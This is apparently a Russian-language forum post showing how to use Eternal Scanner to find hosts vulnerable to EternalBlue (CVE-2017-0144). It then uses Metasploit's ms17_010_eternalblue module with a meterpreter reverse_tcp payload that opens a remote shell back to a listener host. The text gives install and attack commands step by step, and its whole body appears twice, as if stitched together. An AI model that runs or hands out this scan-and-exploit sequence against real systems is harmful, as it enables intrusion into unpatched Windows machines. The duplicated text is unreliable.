Всем привет! В этой статье я хочу продемонстрировать работу сканера, который способен отыскать в сети уязвимые для EternalBlue ( CVE-2017-0144) — кодовое имя эксплойта, эксплуатирующего компьютерную уязвимость в Windows-реализации протокола SMB, хосты.
Итак, собственно – Eternal Scanner.
CVE-2017-0144 Описание:
Сервер SMBv1 в Microsoft Windows Vista SP2; Windows Server 2008 SP2 и R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold и R2; Windows RT 8.1; И Windows 10 Gold, 1511 и 1607; И Windows Server 2016 Позволяет атакующим удаленно выполнять произвольный код с помощью видоизмененных пакетов как в “Windows SMB Remote Code Execution Vulnerability.”. Эта уязвимость отличается от описанной в CVE-2017-0143, CVE-2017-0145, CVE-2017-0146 , И CVE-2017-0148.
Установка:
> git clone https://github.com/peterpt/eternal_scanner
> cd eternal_scanner
> ls –l
Запуск:
> ./escan
Далее, вводим интересующий нас адрес или диапазон, по маске.
Ждем окончания сканирования:
По итогу проверки обнаружилось три хоста уязвимые к данной атаке:
Результаты проверки сканер услужливо сложил в текстовый файлик:
На этом, пожалуй, все, пойду закрывать дырки…
Хотя, сначала, чуть попробую, не соврал ли сканер.
> msfconsole
> use exploit/windows/smb/ms17_010_eternalblue
> msf exploit(ms17_010_eternalblue) >set rhost 192.168.1.158
> msf exploit(ms17_010_eternalblue) >set lhost 192.168.1.180
> msf exploit(ms17_010_eternalblue) >set payload windows/x64/meterpreter/reverse_tcp
> msf exploit(ms17_010_eternalblue) >exploit
Пока, все идет ровно. И буквально через 30 сек:
Теперь можно идти, спасибо за внимание.
Итак, собственно – Eternal Scanner.
CVE-2017-0144 Описание:
Сервер SMBv1 в Microsoft Windows Vista SP2; Windows Server 2008 SP2 и R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold и R2; Windows RT 8.1; И Windows 10 Gold, 1511 и 1607; И Windows Server 2016 Позволяет атакующим удаленно выполнять произвольный код с помощью видоизмененных пакетов как в “Windows SMB Remote Code Execution Vulnerability.”. Эта уязвимость отличается от описанной в CVE-2017-0143, CVE-2017-0145, CVE-2017-0146 , И CVE-2017-0148.
Установка:
> git clone https://github.com/peterpt/eternal_scanner
> cd eternal_scanner
> ls –l
Запуск:
> ./escan
Далее, вводим интересующий нас адрес или диапазон, по маске.
Ждем окончания сканирования:
По итогу проверки обнаружилось три хоста уязвимые к данной атаке:
Результаты проверки сканер услужливо сложил в текстовый файлик:
На этом, пожалуй, все, пойду закрывать дырки…
Хотя, сначала, чуть попробую, не соврал ли сканер.
> msfconsole
> use exploit/windows/smb/ms17_010_eternalblue
> msf exploit(ms17_010_eternalblue) >set rhost 192.168.1.158
> msf exploit(ms17_010_eternalblue) >set lhost 192.168.1.180
> msf exploit(ms17_010_eternalblue) >set payload windows/x64/meterpreter/reverse_tcp
> msf exploit(ms17_010_eternalblue) >exploit
Пока, все идет ровно. И буквально через 30 сек:
Теперь можно идти, спасибо за внимание.
Последнее редактирование: